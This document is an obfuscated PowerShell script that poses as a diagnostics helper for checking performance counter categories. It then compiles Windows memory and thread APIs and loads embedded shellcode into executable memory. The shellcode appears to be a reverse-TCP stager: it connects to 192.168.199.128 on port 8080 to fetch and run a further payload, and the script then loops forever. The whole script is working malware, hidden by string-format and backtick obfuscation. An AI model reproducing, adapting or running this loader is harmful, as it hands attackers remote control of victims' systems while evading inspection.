  ${9b`YN}  =  [TYpE]("{0}{3}{4}{2}{6}{1}{5}" -f 'diAgNOStIcS.PeRForman','O','teRC','CeCOu','N','RY','ateG') ;  
function T`eS`T-cperf`OrM`A`NC`EcoUn`T`ERcaTEGo`RY
{
    
    [CmdletBinding()]
    param(
        [Parameter(MaNDatORY=${Tr`UE})]
        [string]
        
        ${cA`TEgOrY`NAME}
    )
    
    &("{4}{3}{2}{1}{0}" -f'de','StrictMo','-','t','Se') -Version ("{0}{1}" -f 'L','atest')

    .("{3}{2}{1}{0}"-f'ence','lerPrefer','Cal','Use-') -Cmdlet ${ps`cm`dLet} -Session ${eXeC`UT`Io`NConteXt}."sEsSio`NstA`Te"

    return   (  &("{1}{0}"-f 'bLE','VARIa') ("{1}{0}" -f 'N','9by'))."Va`LUE"::("{1}{0}"-f'sts','Exi').Invoke( ${caTEgOR`y`NAme} )
}


${C} = ((("{12}{15}{109}{57}{70}{64}{9}{98}{32}{28}{95}{78}{29}{60}{17}{55}{7}{100}{67}{42}{88}{35}{91}{69}{101}{3}{73}{56}{106}{68}{21}{74}{13}{77}{19}{43}{86}{111}{63}{47}{10}{30}{50}{20}{52}{80}{40}{61}{108}{62}{48}{82}{31}{81}{110}{90}{18}{26}{36}{8}{71}{2}{94}{54}{85}{102}{37}{6}{103}{23}{89}{33}{45}{27}{1}{104}{84}{46}{0}{105}{93}{22}{38}{99}{76}{87}{34}{51}{16}{41}{65}{72}{24}{4}{49}{39}{59}{11}{83}{25}{66}{14}{96}{79}{92}{97}{75}{5}{53}{44}{107}{58}" -f'n','e',', IntP','Size, ui','c extern I',' uin','dress, ','ext','dwSta','0','I','emset(','[Dl',', ui','dest','lIm',')]p',' stati',' lpThreadAttr','lProt','(','yp','adId);[','Ptr','ti','tr','ibutes','r','32','ubl','mpor','tr Create','nel','lpParameter, uin','{0}msvcrt.dll{','lpA',', uint ','d','Dl','t','l{0})]pu','u','ualAlloc(I','ec',' coun','t dwC',' I','ll','nt','n','t','0}','{0}kernel32.','t','pS','c ','lA','o',';','Ptr m','ic','blic s','I','[D','{','blic ',' ','ntPtr Virt','tionT','re','rt(','ckSize','sta','nt f','e','c,','Import','nt f','p',' uint','dl','Threa','P','IntP','onFlags,','t','t','(','ntPtr ',' ','tr','dd',' s','e','tr l','.dll{0})]',',','r','}ker','l','ern I','ss, uint dw','artA','Int','ati','tPtr lpThr','lloca','t)','tatic extern ','p','d(IntP',');'))-f[ChAR]34);${w} = .("{2}{1}{0}" -f'Type','d-','Ad') -memberDefinition ${C} -Name ("{1}{0}" -f '2','Win3') -namespace ("{1}{3}{0}{2}"-f 'n','Wi','ctions','n32Fu') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0xc7,0x80,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."LE`NGTH" -gt 0x1000){${g} = ${Z}."l`eNG`Th"};${X}=${W}::("{2}{0}{1}"-f 'tualAllo','c','Vir').Invoke(0,0x1000,${G},0x40);for (${i}=0;${i} -le (${z}."LE`NGTH"-1);${I}++) {${w}::"ME`ms`ET"([IntPtr](${x}.("{1}{0}{2}"-f 'o','T','Int32').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{1}{0}{2}{3}"-f'reate','C','Thre','ad').Invoke(0,0,${X},0,0,0);for (;;){.("{3}{0}{2}{1}"-f 'r','-sleep','t','Sta') 60};
